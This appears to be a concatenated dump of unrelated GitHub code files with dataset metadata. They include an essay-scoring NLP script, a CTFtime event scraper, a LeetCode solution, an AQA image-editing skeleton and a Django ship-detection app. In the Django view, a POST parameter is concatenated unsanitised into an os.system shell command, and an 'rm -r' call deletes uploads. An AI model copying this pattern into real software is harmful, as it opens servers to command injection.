Cargo el dataset\n\ndf = pd.read_csv(\"text_data.csv\")\n\n## Paso 1: Procesamiento de los datos\n\ndef check_mistakes(text, tool = language_tool_python.LanguageTool('en-GB')): # Busco y corrijo los errores de un solo texto\n\n # Limpieza de formato\n\n pattern = r\"[^\\w\\.',]\"\n\n text = re.sub(pattern, \" \", text)\n\n text = re.sub(f\"[ ]+\", \" \", text)\n\n # Errores ortográficos y tipográficos \n\n spelling_mistakes = len(tool.check(text))\n\n text = tool.correct(text)\n\n # Deshacer contracciones\n \n contract = text.count(\"'\")\n\n correct_text = contractions.fix(text)\n\n return spelling_mistakes, contract, correct_text\n\ndef check_data(df): # Busco y corrijo los errores de todos los textos del DataFrame\n \n # Inicializo las listas\n \n spelling_mistakes_list = list()\n \n contract_list = list()\n \n correct_text_list = list()\n \n # Inica el servidor\n \n tool = language_tool_python.LanguageTool('en-GB') # Servidor local\n\n # Analizo los textos\n\n for i in range(len(df)):\n\n text = df[\"full_text\"][i]\n\n spelling_mistakes, contract, correct_text = check_mistakes(text, tool)\n \n spelling_mistakes_list.append(spelling_mistakes)\n \n contract_list.append(contract)\n \n correct_text_list.append(correct_text)\n \n # Cierra el servidor\n \n tool.close() \n\n # Añado los valores al DataFrame\n \n df[\"correct_text\"] = np.array(correct_text_list)\n\n df[\"spelling_mistakes\"] = np.array(spelling_mistakes_list)\n \n df[\"contractions\"] = np.array(contract_list)\n \n return df\n\n# Ejecuto el procesamiento de los datos del dataframe\n\ncorrect_df = check_data(df)\n\ncorrect_df.to_csv(\"corrected_text.csv\", index = False)\n\n## Paso 2: Procesamiento del lenguaje natural (NLP)\n\ndef get_metrics(text): # Obtengo las métricas de un solo texto\n\n # Numero de palabras por oracion\n\n sentences = len(nltk.sent_tokenize(text))\n\n words = len(nltk.word_tokenize(text))\n\n words_per_sent = words / sentences\n\n # Riqueza del lenguaje\n\n unique_words = len(set(nltk.word_tokenize(text)))\n\n richness = unique_words / words\n\n # Numero de palabras que aportan información\n\n stopwords = nltk.corpus.stopwords.words(\"english\")\n\n useful_words = list()\n\n # Elimino los signos de puntuación para analizar el texto\n\n pattern = r\"[^\\w\\d\\s]\"\n\n clean_text = re.sub(pattern, \" \", text)\n\n clean_text = re.sub(f\"[ ]+\", \" \", clean_text)\n\n for word in nltk.word_tokenize(clean_text):\n\n if word.casefold() not in stopwords :\n\n useful_words.append(word)\n\n informative = len(useful_words) / words\n \n # Análisis sintáxico / morfológico\n\n verb = [\"VB\", \"VBD\", \"VBG\", \"VBN\", \"VBP\", \"VBZ\"]\n\n verb_list = list()\n\n adjective = [\"JJ\", \"JJR\", \"JJS\"]\n\n adjective_list = list()\n\n adverb = [\"RB\", \"RBR\", \"RBS\"]\n\n adverb_list = list()\n\n blob = TextBlob(text)\n\n for word in blob.tags:\n\n if word[1] in verb:\n\n v = Word(word[0]).lemmatize(\"v\")\n\n verb_list.append(v)\n\n elif word[1] in adjective:\n\n adjective_list.append(word[0])\n\n elif word[1] in adverb:\n\n adverb_list.append(word[0])\n\n # Tipos de palabras utilizadas\n\n unique_verbs = len(set(verb_list))\n\n unique_adjectives = len(set(adjective_list))\n\n unique_adverbs = len(set(adverb_list))\n \n # Análisis del sentimiento del texto\n\n blob = TextBlob(text, analyzer = PatternAnalyzer())\n\n polarity = blob.sentiment[0]\n\n subjectivity = blob.sentiment[1]\n \n # Análisis del sentimiento del texto\n\n #blob = TextBlob(text, analyzer = NaiveBayesAnalyzer())\n\n #positive = blob.sentiment[1]\n\n #negative = blob.sentiment[2]\n \n return words_per_sent, richness, informative, unique_verbs, unique_adjectives, unique_adverbs, polarity, subjectivity\n\ndef get_metrics_data(df): # Obtengo las métricas de todos los textos del DataFrame\n \n # Inicializo las listas\n \n words_per_sent_list = list()\n \n richness_list = list()\n \n informative_list = list()\n \n unique_verbs_list = list()\n \n unique_adjectives_list = list()\n \n unique_adverbs_list = list()\n \n polarity_list = list()\n \n subjectivity_list = list()\n \n spelling_mistakes_list = list()\n \n contract_list = list()\n \n correct_text_list = list()\n\n # Analizo los textos\n\n for i in range(len(df)):\n\n text = df[\"correct_text\"][i]\n\n words_per_sent, richness, informative, unique_verbs, unique_adjectives, unique_adverbs, polarity, subjectivity = get_metrics(text)\n \n words_per_sent_list.append(words_per_sent)\n \n richness_list.append(richness)\n \n informative_list.append(informative)\n\n unique_verbs_list.append(unique_verbs)\n\n unique_adjectives_list.append(unique_adjectives)\n\n unique_adverbs_list.append(unique_adverbs)\n\n polarity_list.append(polarity)\n \n subjectivity_list.append(subjectivity)\n\n # Añado los valores al DataFrame\n\n df[\"words_per_sent\"] = np.array(words_per_sent_list)\n \n df[\"richness\"] = np.array(richness_list)\n \n df[\"informative\"] = np.array(informative_list)\n\n df[\"unique_verbs\"] = np.array(unique_verbs_list)\n\n df[\"unique_adjectives\"] = np.array(unique_adjectives_list)\n\n df[\"unique_adverbs\"] = np.array(unique_adverbs_list)\n\n df[\"polarity\"] = np.array(polarity_list)\n \n df[\"subjectivity\"] = np.array(subjectivity_list)\n \n return df\n\n# Ejecuto el procesamiento de los datos del dataframe\n\nscored_df = get_metrics_data(correct_df)\n\nscored_df.to_csv(\"scored_text.csv\", index = False)\n","repo_name":"martabuaf/English-Text-Evaluation","sub_path":"text_processing.py","file_name":"text_processing.py","file_ext":"py","file_size_in_byte":6130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25964291666","text":"#!/usr/bin/env python\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom rich.console import Console\nfrom rich.table import Table\nfrom datetime import datetime\nimport argparse\nfrom sys import exit\nfrom rich import print\nfrom ctfl import __version__\n\n\ndef main():\n url = 'https://ctftime.org/event/list/upcoming'\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5\\\n 37.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'\n }\n\n parser = parseArgs()\n args = parser.parse_args()\n\n months = {1: \"Jan\", 2: \"Feb\", 3: \"Mar\", 4: \"Apr\", 5: \"May\", 6: \"Jun\", 7: \"Jul\", 8: \"Aug\", 9: \"Sept\", 10: \"Oct\", 11: \"Nov\", 12: \"Dec\"}\n\n if (args.next):\n month = months[int(datetime.now().strftime(\"%m\")) + 1]\n elif (args.all):\n month = None\n elif (args.version):\n print(\"[bold]ctfl {}[/]\".format(__version__))\n exit(0)\n else:\n month = datetime.now().strftime(\"%b\")\n try:\n data = extract_data(url, headers, month)\n print_data(data)\n except KeyboardInterrupt:\n exit(1)\n except Exception:\n print(\"[[bold red]-[/]] Unexpected error occurred, Try again...\")\n\n\ndef parseArgs():\n parser = argparse.ArgumentParser(description=\"CTFTime Upcoming CTF Events Lists\")\n group = parser.add_mutually_exclusive_group(required=False)\n group.add_argument(\n \"-n\",\n \"--next\",\n action=\"store_true\",\n help=\"Get the list of events for the next month\"\n )\n group.add_argument(\n \"-a\",\n \"--all\",\n action=\"store_true\",\n help=\"List all available CTFs on the event list\"\n )\n group.add_argument(\n \"-v\",\n \"--version\",\n action=\"store_true\",\n help=\"Prints the version of the tool\"\n )\n return parser\n\n\ndef extract_data(url, headers, month):\n req = requests.get(url, headers=headers)\n\n soup = BeautifulSoup(req.text, 'html.parser')\n events_table = soup.find_all('table')[0]\n\n names = []\n dates = []\n styles = []\n locations = []\n weights = []\n links = []\n base_link = \"https://ctftime.org\"\n\n if (month is not None):\n for i in events_table.find_all('tr')[1::]:\n columns = i.find_all('td')\n date = columns[1].text.strip()\n if (month in date):\n dates.append(date)\n names.append(columns[0].a.text.strip())\n links.append(base_link + columns[0].a.get('href').strip())\n styles.append(columns[2].text.strip())\n locations.append(columns[3].text.strip())\n weights.append(columns[4].text.strip())\n else:\n pass\n else:\n for i in events_table.find_all('tr')[1:]:\n columns = i.find_all('td')\n names.append(columns[0].a.text.strip())\n links.append(base_link + columns[0].a.get('href').strip())\n dates.append(columns[1].text.strip())\n styles.append(columns[2].text.strip())\n locations.append(columns[3].text.strip())\n weights.append(columns[4].text.strip())\n\n data = [names, dates, styles, locations, weights, links]\n return data\n\n\ndef print_data(data):\n table = Table(title=\"CTFTime CTF Events\")\n\n table.add_column(\"Name\", justify=\"left\", style=\"cyan\", no_wrap=True)\n table.add_column(\"Date\", justify=\"center\", style=\"cyan\")\n table.add_column(\"Style\", justify=\"center\", style=\"cyan\")\n table.add_column(\"Location\", justify=\"center\", style=\"cyan\")\n table.add_column(\"Weight\", justify=\"right\", style=\"cyan\")\n\n for i in range(len(data[0])):\n table.add_row(data[0][i], data[1][i], data[2][i], data[3][i], data[4][i], style=\"link \" + data[5][i])\n\n console = Console()\n console.print(table)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"thehackersbrain/ctfl","sub_path":"ctfl/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73247650889","text":"# Problem: https://leetcode.com/problems/missing-number/\n\n# Complexity: O(n) time, O(n) space\n\nfrom typing import Dict, List\n\n\nclass Solution:\n def missingNumber(self, nums: List[int]) -> int:\n keys: Dict[int, int] = {}\n\n for n in nums:\n keys[n] = 1\n\n for i in range(len(nums)+1):\n if i not in keys:\n return i\n\n # Should not get here\n return -1\n","repo_name":"emmaneugene/algos","sub_path":"leetcode/blind75/missingNumber.py","file_name":"missingNumber.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"31216974063","text":"\"\"\"\nTabela de emojis Unicode: https://apps.timwhitlock.info/emoji/tables/unicode\n\nOriginal: U+1F60D\nModificado: U0001F60D => mantém o U e acrescenta 3 zeros e replica o resto do código.\n\nPara executar 1 vez\n for num in range(1, 11):\n print('\\U0001F60D' * num)\nSe quiser executar 3 vezes\nfor _ in range(3):\n for num in range(1, 11):\n print('\\U0001F60D' * num)\n\n\"\"\"\n\n\nfor _ in range(3):\n for num in range(1, 11):\n print('\\U0001F60D' * num)\n","repo_name":"vanderleikoziol/koziol-git1","sub_path":"secao06/emoji.py","file_name":"emoji.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"346030845","text":"import argparse\nimport pandas as pd\nfrom vcsl import *\nfrom torch.utils.data import DataLoader\nfrom loguru import logger\nfrom itertools import product, islice\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--query-file\", \"-Q\", type=str, help=\"data file\")\n parser.add_argument(\"--reference-file\", \"-G\", type=str, help=\"data file\")\n parser.add_argument(\"--pair-file\", type=str, help=\"data file\")\n\n parser.add_argument(\"--input-store\", type=str, help=\"store of input data: oss|local\", default=\"oss\")\n parser.add_argument(\"--input-root\", type=str, help=\"root path of input data\", default=\"\")\n\n parser.add_argument(\"--oss-config\", type=str, default='~/ossutilconfig-copyright', help=\"url path\")\n parser.add_argument(\"--batch-size\", \"-b\", type=int, default=32, help=\"batch size\")\n parser.add_argument(\"--data-workers\", type=int, default=16, help=\"data workers\")\n parser.add_argument(\"--request-workers\", type=int, default=4, help=\"data workers\")\n parser.add_argument(\"--output-root\", type=str, help=\"output root\")\n parser.add_argument(\"--output-store\", type=str, help=\"store of output data: oss|local\")\n\n # Hyper parameters or input model\n parser.add_argument(\"--alignment-method\", type=str, default=\"DTW\", help=\"DTW, DP, TN alignment method\")\n\n parser.add_argument(\"--min-length\", type=int, default=5, help=\"minimum length of one segment\")\n parser.add_argument(\"--sum-sim\", type=float, default=10., help=\"minimum accumulated sim of one segment\")\n parser.add_argument(\"--ave-sim\", type=float, default=0.3, help=\"average sim of one segment\")\n parser.add_argument(\"--min-sim\", type=float, default=0.2, help=\"minimum average sim of one segment\")\n\n parser.add_argument(\"--max-path\", type=int, default=10, help=\"maximum number of paths to predict\")\n parser.add_argument(\"--discontinue\", type=int, default=3, help=\"max discontinue point in path\")\n parser.add_argument(\"--max-iou\", type=float, default=0.3, help=\"max iou to filter bboxes\")\n\n parser.add_argument(\"--diagonal-thres\", type=int, default=10, help=\"threshold for discarding a vertical/horizontal part of a segment for DP\")\n\n parser.add_argument(\"--tn-top-K\", type=int, default=5, help=\"top k nearest for TN\")\n parser.add_argument(\"--tn-max-step\", type=int, default=10, help=\"max step for TN\")\n\n parser.add_argument(\"--spd-model-path\", type=str, help=\"SPD model path\")\n parser.add_argument(\"--device\", type=str, help=\"cpu or cuda:0 or others, only valid to SPD inference\")\n parser.add_argument(\"--spd-conf-thres\", type=float, default=0.5, help=\"bounding box conf filter for SPD inference\")\n\n\n parser.add_argument(\"--params-file\", type=str)\n\n parser.add_argument(\"--result-file\", default=\"pred.json\", type=str, help=\"result path\")\n\n args = parser.parse_args()\n\n pairs, files_dict, query, reference = None, None, None, None\n if args.pair_file:\n df = pd.read_csv(args.pair_file)\n pairs = df[['query_id', 'reference_id']].values.tolist()\n\n data_list = [(f\"{p[0]}-{p[1]}\", f\"{p[0]}-{p[1]}\") for p in pairs]\n else:\n query = pd.read_csv(args.query_file)\n query = query[['uuid']].values.tolist()\n\n reference = pd.read_csv(args.reference_file)\n reference = reference[['uuid']].values.tolist()\n\n pairs = product(query, reference)\n data_list = [(f\"{p[0]}-{p[1]}\", f\"{p[0]}-{p[1]}\") for p in pairs]\n\n config = dict()\n if args.input_store == 'oss':\n config['oss_config'] = args.oss_config\n\n dataset = ItemDataset(data_list,\n store_type=args.input_store,\n data_type=DataType.NUMPY.type_name,\n root=args.input_root,\n trans_key_func=lambda x: x + '.npy',\n **config)\n\n logger.info(f\"Data to run {len(dataset)}\")\n\n loader = DataLoader(dataset, collate_fn=lambda x: x,\n batch_size=args.batch_size,\n num_workers=args.data_workers)\n\n model_config = dict()\n if args.alignment_method.startswith('DTW'):\n model_config = dict(\n discontinue=args.discontinue,\n min_sim=args.min_sim,\n min_length=args.min_length,\n max_iou=args.max_iou\n )\n elif args.alignment_method.startswith('TN'):\n model_config = dict(\n tn_max_step=args.tn_max_step, tn_top_k=args.tn_top_K, max_path=args.max_path,\n min_sim=args.min_sim, min_length=args.min_length, max_iou=args.max_iou\n )\n elif args.alignment_method.startswith('DP'):\n model_config = dict(discontinue=args.discontinue,\n min_sim=args.min_sim,\n ave_sim=args.ave_sim,\n min_length=args.min_length,\n diagonal_thres=args.diagonal_thres)\n elif args.alignment_method.startswith('HV'):\n model_config = dict(min_sim=args.min_sim, iou_thresh=args.max_iou)\n elif args.alignment_method.startswith('SPD'):\n model_config = dict(model_path=args.spd_model_path,\n conf_thresh=args.spd_conf_thres,\n device=args.device)\n else:\n raise ValueError(f\"Unknown VTA method: {args.alignment_method}\")\n\n # override model config with param file\n if args.params_file:\n reader = build_reader(args.input_store, DataType.JSON.type_name, **config)\n param_result = reader.read(args.params_file)\n best_params = param_result['best']\n logger.info(\"best param {}\", best_params)\n model_config = best_params['param']\n\n model = build_vta_model(method=args.alignment_method, concurrency=args.request_workers, **model_config)\n\n total_result = dict()\n for batch_data in islice(loader, 0, None):\n logger.info(\"data cnt: {}, {}\", len(batch_data), batch_data[0][0])\n batch_result = model.forward_sim(batch_data)\n logger.info(\"result cnt: {}\", len(batch_result))\n\n for pair_id, result in batch_result:\n total_result[pair_id] = result\n\n output_store = args.input_store if args.output_store is None else args.output_store\n if output_store == 'local' and not os.path.exists(args.output_root):\n os.makedirs(args.output_root, exist_ok=True)\n writer = build_writer(output_store, DataType.JSON.type_name, **config)\n writer.write(os.path.join(args.output_root, args.result_file), total_result)\n","repo_name":"ant-research/VCSL","sub_path":"run_video_vta.py","file_name":"run_video_vta.py","file_ext":"py","file_size_in_byte":6503,"program_lang":"python","lang":"en","doc_type":"code","stars":96,"dataset":"github-code","pt":"16"} +{"seq_id":"23300989922","text":"# Skeleton Program for the AQA AS1 Summer 2020 examination\r\n# this code should be used in conjunction with the Preliminary Material\r\n# written by the AQA AS1 Programmer Team\r\n# developed in a Python 3 environment\r\n\r\n# Version number: 0.0.0\r\n\r\nEMPTY_STRING = \"\"\r\nMAX_WIDTH = 100\r\nMAX_HEIGHT = 100\r\n\r\nclass FileHeader:\r\n \"\"\"\r\n Parameters: self\r\n Description: Creates an object with a title, width, height and filetype\r\n \"\"\"\r\n def __init__(self):\r\n self.Title = EMPTY_STRING\r\n self.Width = MAX_WIDTH\r\n self.Height = MAX_HEIGHT\r\n self.FileType = EMPTY_STRING \r\n\r\ndef DisplayError(ErrorMessage):\r\n \"\"\"\r\n Parameters: String\r\n Description: Takes in a string as an error message displays it\r\n \"\"\"\r\n print(\"Error: \", ErrorMessage)\r\n\r\ndef PrintHeading(Heading):\r\n \"\"\"\r\n Parameters: String\r\n Description: Displays the heading underlined with equal symbols\r\n \"\"\"\r\n print(Heading)\r\n HeadingLength = len(Heading)\r\n for Position in range(1, HeadingLength + 1):\r\n print('=', end='')\r\n print()\r\n\r\ndef DisplayImage(Grid, Header):\r\n \"\"\"\r\n Parameters: List, Object\r\n Description: Prints image heading, then prints/displays the image\r\n \"\"\"\r\n print()\r\n PrintHeading(Header.Title)\r\n for ThisRow in range(Header.Height):\r\n for ThisColumn in range(Header.Width):\r\n print(Grid[ThisRow][ThisColumn], end='')\r\n print()\r\n\r\ndef SaveImage(Grid, Header):\r\n \"\"\"\r\n Parameters: 2D list, Object\r\n Description: \r\n \"\"\"\r\n print(\"The current title of your image is: \" + Header.Title)\r\n Answer = input(\"Do you want to use this as your filename? (Y/N) \")\r\n if Answer == \"N\" or Answer == \"n\":\r\n FileName = input(\"Enter a new filename: \")\r\n else:\r\n FileName = Header.Title\r\n FileOut = open(FileName + \".txt\", 'w')\r\n FileOut.write(Header.Title + '\\n')\r\n for Row in range(Header.Height):\r\n for Column in range(Header.Width):\r\n FileOut.write(Grid[Row][Column])\r\n FileOut.write('\\n')\r\n FileOut.close()\r\n\r\ndef EditImage(Grid, Header):\r\n \"\"\"\r\n Parameters: 2D List, Object\r\n Return Type: 2D List\r\n Description: Allows user to edit the image by changing one of the symbols to another \r\n \"\"\"\r\n DisplayImage(Grid, Header)\r\n Answer = EMPTY_STRING\r\n while Answer != \"N\":\r\n Symbol = EMPTY_STRING\r\n NewSymbol = EMPTY_STRING\r\n while len(Symbol) != 1:\r\n Symbol = input(\"Enter the symbol you want to replace: \")\r\n while len(NewSymbol) != 1:\r\n NewSymbol = input(\"Enter the new symbol: \")\r\n for ThisRow in range(Header.Height):\r\n for ThisColumn in range(Header.Width):\r\n if Grid[ThisRow][ThisColumn] == Symbol:\r\n Grid[ThisRow][ThisColumn] = NewSymbol\r\n DisplayImage(Grid, Header)\r\n Answer = input(\"Do you want to make any further changes? (Y/N) \")\r\n return Grid\r\n\r\ndef ConvertChar(PixelValue):\r\n \"\"\"\r\n Parameters: Integer\r\n Return Type: String\r\n Description: Returns a character based on the value of the pixel put in\r\n \"\"\"\r\n if PixelValue <= 32:\r\n AsciiChar = '#'\r\n elif PixelValue <= 64:\r\n AsciiChar = '&'\r\n elif PixelValue <= 96:\r\n AsciiChar = '+'\r\n elif PixelValue <= 128:\r\n AsciiChar = ';'\r\n elif PixelValue <= 160:\r\n AsciiChar = ':'\r\n elif PixelValue <= 192:\r\n AsciiChar = ','\r\n elif PixelValue <= 224:\r\n AsciiChar = '.'\r\n else:\r\n AsciiChar = ' '\r\n return AsciiChar\r\n\r\ndef LoadGreyScaleImage(FileIn, Grid, Header):\r\n \"\"\"\r\n Parameters: String, 2D List, Object\r\n Return Type: 2D List\r\n Description: Loads an image using each pixel and a specific code assigned to each pixel\r\n \"\"\"\r\n try:\r\n for Row in range(Header.Height):\r\n for Column in range(Header.Width):\r\n NextPixel = FileIn.readline()\r\n PixelValue = int(NextPixel)\r\n Grid[Row][Column] = ConvertChar(PixelValue)\r\n except:\r\n DisplayError(\"Image data error\") \r\n return Grid\r\n \r\ndef LoadAsciiImage(FileIn, Grid, Header):\r\n \"\"\"\r\n Parameters: String, 2D List, Object\r\n Return Type: 2D List\r\n Description: Loads an image using the width and height of the heading as dimensions\r\n \"\"\"\r\n try:\r\n ImageData = FileIn.readline()\r\n NextChar = 0\r\n for Row in range(Header.Height):\r\n for Column in range(Header.Width):\r\n Grid[Row][Column] = ImageData[NextChar]\r\n NextChar += 1\r\n except:\r\n DisplayError(\"Image data error\")\r\n return Grid\r\n\r\ndef LoadFile(Grid, Header):\r\n \"\"\"\r\n Parameters: 2D List, Object\r\n Return Type: 2D List, Object\r\n Description: Opens the file in read mode, and then splits each line into fields and loads an asciiImage or greyscaleimage as the grid depending on the filetype of the header, and then checks if the file exists, and finally returns the grid\r\n \"\"\"\r\n FileFound = False\r\n FileTypeOK = False\r\n FileName = input(\"Enter filename to load: \")\r\n try:\r\n FileIn = open(FileName + \".txt\", 'r')\r\n FileFound = True\r\n HeaderLine = FileIn.readline()\r\n Fields = HeaderLine.split(',')\r\n Header.Title = Fields[0]\r\n Header.Width = int(Fields[1])\r\n Header.Height = int(Fields[2])\r\n Header.FileType = Fields[3]\r\n Header.FileType = Header.FileType[0]\r\n if Header.FileType == 'A': \r\n Grid = LoadAsciiImage(FileIn, Grid, Header)\r\n FileTypeOK = True\r\n elif Header.FileType == 'G': \r\n Grid = LoadGreyScaleImage(FileIn, Grid, Header)\r\n FileTypeOK = True\r\n FileIn.close()\r\n if not FileTypeOK:\r\n DisplayError(\"Unknown file type\")\r\n else:\r\n DisplayImage(Grid, Header)\r\n except:\r\n if not FileFound:\r\n DisplayError(\"File not found\")\r\n else:\r\n DisplayError(\"Unknown error\")\r\n return Grid, Header\r\n\r\ndef SaveFile(Grid, Header):\r\n \"\"\"\r\n Parameters: 2D List, Object\r\n Description: Opens a file required by the user in write mode, then writes each field to the file separated by commas, and also writes the grid to the file, and then closes it\r\n \"\"\"\r\n FileName = input(\"Enter filename: \")\r\n FileOut = open(FileName + \".txt\", 'w')\r\n FileOut.write(Header.Title + ',' + str(Header.Width) + ',' + str(Header.Height) + ',' + 'A' + '\\n')\r\n for Row in range(Header.Height):\r\n for Column in range(Header.Width):\r\n FileOut.write(Grid[Row][Column])\r\n FileOut.close()\r\n\r\ndef ClearGrid(Grid):\r\n \"\"\"\r\n Parameters: 2D List\r\n Return Type: 2D List\r\n Description: Clears the grid by replacing each pixel with a . and returns it\r\n \"\"\"\r\n for Row in range(MAX_HEIGHT):\r\n for Column in range(MAX_WIDTH):\r\n Grid[Row][Column] = '.'\r\n return Grid\r\n \r\ndef DisplayMenu():\r\n \"\"\"\r\n Description: Displays the main menu screen\r\n \"\"\"\r\n print()\r\n print(\"Main Menu\")\r\n print(\"=========\")\r\n print(\"L - Load graphics file\") \r\n print(\"D - Display image\")\r\n print(\"E - Edit image\")\r\n print(\"S - Save image\")\r\n print(\"X - Exit program\") \r\n print()\r\n\r\ndef GetMenuOption():\r\n \"\"\"\r\n Return Type: String\r\n Description: Asks the user to enter their menu option and returns it\r\n \"\"\"\r\n MenuOption = EMPTY_STRING\r\n while len(MenuOption) != 1:\r\n MenuOption = input(\"Enter your choice: \")\r\n return MenuOption\r\n \r\ndef Graphics():\r\n \"\"\"\r\n Description: Displays the menu, then asks for a menu option, then does the according function depending on the user's selected option, then saves the file\r\n \"\"\"\r\n Grid = [['' for Column in range(MAX_WIDTH)] for Row in range(MAX_HEIGHT)]\r\n Grid = ClearGrid(Grid)\r\n Header = FileHeader()\r\n ProgramEnd = False\r\n while not ProgramEnd:\r\n DisplayMenu()\r\n MenuOption = GetMenuOption()\r\n if MenuOption == 'L':\r\n Grid, Header = LoadFile(Grid, Header)\r\n elif MenuOption == 'D':\r\n DisplayImage(Grid, Header) \r\n elif MenuOption == 'E':\r\n Grid = EditImage(Grid, Header) \r\n elif MenuOption == 'S': \r\n SaveImage(Grid, Header)\r\n elif MenuOption == 'X':\r\n ProgramEnd = True\r\n else:\r\n print(\"You did not choose a valid menu option. Try again\")\r\n print(\"You have chosen to exit the program\")\r\n Answer = input(\"Do you want to save the image as a graphics file? (Y/N) \")\r\n if Answer == \"Y\" or Answer == \"y\":\r\n SaveFile(Grid, Header)\r\n \r\nif __name__ == \"__main__\":\r\n Graphics() \r\n","repo_name":"Usman198316/Programming-Challenges","sub_path":"2020 Pre-Release/A-level_Computer Science_Computer Science (7517)_Preliminary Material_AS_June 2020 (to be used in autumn 2020)_Python 3_Paper1_AS_2020_Python3_Pub_0.0.0.py","file_name":"A-level_Computer Science_Computer Science (7517)_Preliminary Material_AS_June 2020 (to be used in autumn 2020)_Python 3_Paper1_AS_2020_Python3_Pub_0.0.0.py","file_ext":"py","file_size_in_byte":8094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5079137045","text":"from django.http import HttpResponse \nfrom django.shortcuts import render, redirect\nimport os\nfrom home import forms\nfrom django.views.generic import TemplateView\nimport os\n\nclass Index(TemplateView):\n template_name = 'home/index.html'\n\ndef ShipDetection_view(request):\n if request.method == 'POST': \n form = forms.ShipForm(request.POST, request.FILES) \n \n if form.is_valid(): \n form.save() \n scale = request.POST.get(\"scale\")\n return predict(request, scale)\n else:\n print(os.getcwd())\n os.system('rm -r ./media/images/')\n form = forms.ShipForm() \n return render(request, 'home/im.html', {'form' : form}) \n\n \ndef predict(request, scale): \n path = os.getcwd()\n\n ls = os.listdir('./media/images/')\n os.chdir(path + '/home/model/SIH5/model/darknet/')\n os.system('python3 r3unfile.py ' + path + '/media/images/' + str(ls[0] + ' ' + path) + ' ' + str(scale))\n os.chdir(path + '/')\n return render(request, 'home/display_images.html')\n\n\ndef Upload(request):\n image = request.POST.get('image')\n print(type(image))\n return render(request, 'home/upload_image.html')\n\ndef display_ship_images(request): \n \n if request.method == 'GET': \n return render(request, 'home/display_images.html')\n","repo_name":"himdhiman/SIH-2020-Ship_Detection-Project-ISRO","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"2648627903","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 20 17:52:01 2014\n\n@author: namm\n\"\"\"\nimport sys\nsys.path.append(\"..\")\nfrom agente_prospector.agente.controlo import Controlo\n\nfrom agente_prospector.controlo_react.reaccoes.reaccao_avancar import ReaccaoAvancar\n\n\nclass ControloReact(Controlo):\n \n def __init__(self):\n self._reaccao = ReaccaoAvancar()\n \n def processar(self, percepcao):\n accao = self._reaccao.activar(percepcao)\n return accao\n \n","repo_name":"jorge-ribamar/IASA","sub_path":"src/agente_prospector/controlo_react/controlo_react.py","file_name":"controlo_react.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11216205358","text":"import matplotlib.pyplot as plt\n\n\nclass VisualizePlays(object):\n def __init__(self, *agents, alpha=0.8):\n \"\"\"\n create a visualization method\n Args:\n agents (object): trained q-learning agent\n \"\"\"\n self.agents = agents\n self.aplpha = alpha\n self.x_label = \"#episodes\"\n\n def plot_reward(self):\n \"\"\"_summary_\"\"\"\n\n plt.title(\"Reward over time per episode\")\n for i, agent in enumerate(self.agents):\n plt.plot(\n agent.rewards,\n c=agent.color,\n label=agent.name,\n linewidth=1,\n linestyle=\"-\",\n alpha=self.aplpha,\n )\n plt.xlabel(self.x_label)\n plt.ylabel(\"Reward\")\n plt.grid()\n plt.legend(\n loc=\"upper center\",\n bbox_to_anchor=(0.5, -0.05),\n fancybox=True,\n shadow=True,\n ncol=1,\n )\n\n def plot_epsilon(self):\n \"\"\"_summary_\"\"\"\n\n # 2\n plt.title(\"Exploration parameter epsilon per episode\")\n for i, agent in enumerate(self.agents):\n plt.plot(\n agent.epsilons,\n c=agent.color,\n label=agent.name,\n linewidth=1,\n linestyle=\"-\",\n alpha=self.aplpha,\n )\n plt.xlabel(self.x_label)\n plt.ylabel(\"Epsilon\")\n plt.grid()\n plt.legend(\n loc=\"upper center\",\n bbox_to_anchor=(0.5, -0.05),\n fancybox=True,\n shadow=True,\n ncol=1,\n )\n\n def plot_last_agent_state(self):\n \"\"\"_summary_\"\"\"\n plt.title(\"Last state the agent is standing on at the end of the episode\")\n for i, agent in enumerate(self.agents):\n plt.plot(\n agent.last_states,\n c=agent.color,\n label=agent.name,\n linewidth=1,\n linestyle=\"-\",\n alpha=self.aplpha,\n )\n plt.xlabel(self.x_label)\n plt.ylabel(\"last state number\")\n plt.grid()\n plt.legend(\n loc=\"upper center\",\n bbox_to_anchor=(0.5, -0.05),\n fancybox=True,\n shadow=True,\n ncol=1,\n )\n\n def plot_q_values(self):\n \"\"\"_summary_\"\"\"\n plt.title(\"Average of the value of the q-table\")\n for i, agent in enumerate(self.agents):\n plt.plot(\n agent.q_averages,\n c=agent.color,\n label=agent.name,\n linewidth=1,\n linestyle=\"-\",\n alpha=self.aplpha,\n )\n plt.xlabel(self.x_label)\n plt.ylabel(\"q-table average values\")\n plt.grid()\n plt.legend(\n loc=\"upper center\",\n bbox_to_anchor=(0.5, -0.05),\n fancybox=True,\n shadow=True,\n ncol=1,\n )\n\n def plot(self):\n \"\"\"_summary_\"\"\"\n\n plt.figure(figsize=(10, 20))\n\n plt.subplot(4, 1, 1)\n self.plot_reward()\n\n plt.subplot(4, 1, 2)\n self.plot_epsilon()\n\n plt.subplot(4, 1, 3)\n self.plot_last_agent_state()\n\n plt.subplot(4, 1, 4)\n self.plot_q_values()\n\n plt.tight_layout()\n 